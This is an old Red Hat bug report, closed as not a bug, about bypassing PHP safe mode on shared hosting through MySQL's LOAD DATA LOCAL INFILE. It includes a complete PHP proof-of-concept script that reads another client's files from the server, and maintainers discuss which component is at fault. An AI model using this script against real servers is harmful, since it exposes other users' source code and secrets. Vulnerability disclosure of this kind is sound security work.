Bug 59916 - PHP in safe mode can read all the server contents
PHP in safe mode can read all the server contents
Status: CLOSED NOTABUG
Product: Red Hat Linux
Classification: Retired
Component: mysql (Show other bugs)
7.2
i386 Linux
medium Severity medium
: ---
: ---
Assigned To: Patrick Macdonald
David Lawrence
: Security
Depends On:
Blocks:
  Show dependency treegraph
 
Reported: 2002-02-14 15:26 EST by Renato
Modified: 2007-04-18 12:40 EDT (History)
0 users

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2002-02-27 08:53:57 EST
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description Renato 2002-02-14 15:26:06 EST
From Bugzilla Helper:
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)

Description of problem:
By using a flaw in PHP+Mysql query, somebody can bypass safe mode. 

Version-Release number of selected component (if applicable):


How reproducible:
Always

Steps to Reproduce:
1. Use the script:

$host = 'localhost';
$user = 'root';
$pass = 'letmein';
$db   = 'teste';

$filename = '/home/othercliente/myscript.php';     /* File to grab from [local] 
server */
$local = true;                      /* Read from local filesystem */

$local = $local ? 'LOCAL' : '';


$sql = array (
   "USE $db",

   'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',

   "LOAD DATA $local INFILE '$filename' INTO TABLE $tbl FIELDS "
   . "TERMINATED BY       '__THIS_NEVER_HAPPENS__' "
   . "ESCAPED BY          '' "
   . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",

   "SELECT a FROM $tbl LIMIT 1"
);

Header ('Content-type: text/plain');

mysql_connect ($host, $user, $pass);	

foreach ($sql as $statement) {
   $q = mysql_query ($statement);

   if ($q == false) die (
      "FAILED: " . $statement . "\n" .
      "REASON: " . mysql_error () . "\n"
   );

   if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;

   echo $r [0];
   mysql_free_result ($q);
}

2. Call the script using wget http://server/script

Actual Results:  You can view the source of the other client

Additional info:
Comment 1 Phil Copeland 2002-02-14 16:28:13 EST
rpm -q php
I need to know which one it is please 

cheers

Phil
=--=
Comment 2 Renato 2002-02-15 05:40:35 EST
php: 4.0.6-7
php-mysql: 4.0.6-7

It's configured as a module in Apache.
Comment 3 Peter Bowen 2002-02-27 08:53:52 EST
This is not a bug in PHP.  This is a potential bug with MySQL, but php' safe
mode cannot prevent this.  PHP can only protect internal php functions, and
mysql_* use the mysql client library.  I'm moving this to the MySQL component,
as it can only be handled there.
Comment 4 Trond Eivind Glomsrxd 2002-04-08 15:31:47 EDT
This is not a bug in mysql, it does what you want and it can do. Don't set up
unsafe scripts

Note You need to log in before you can comment on or make changes to this bug.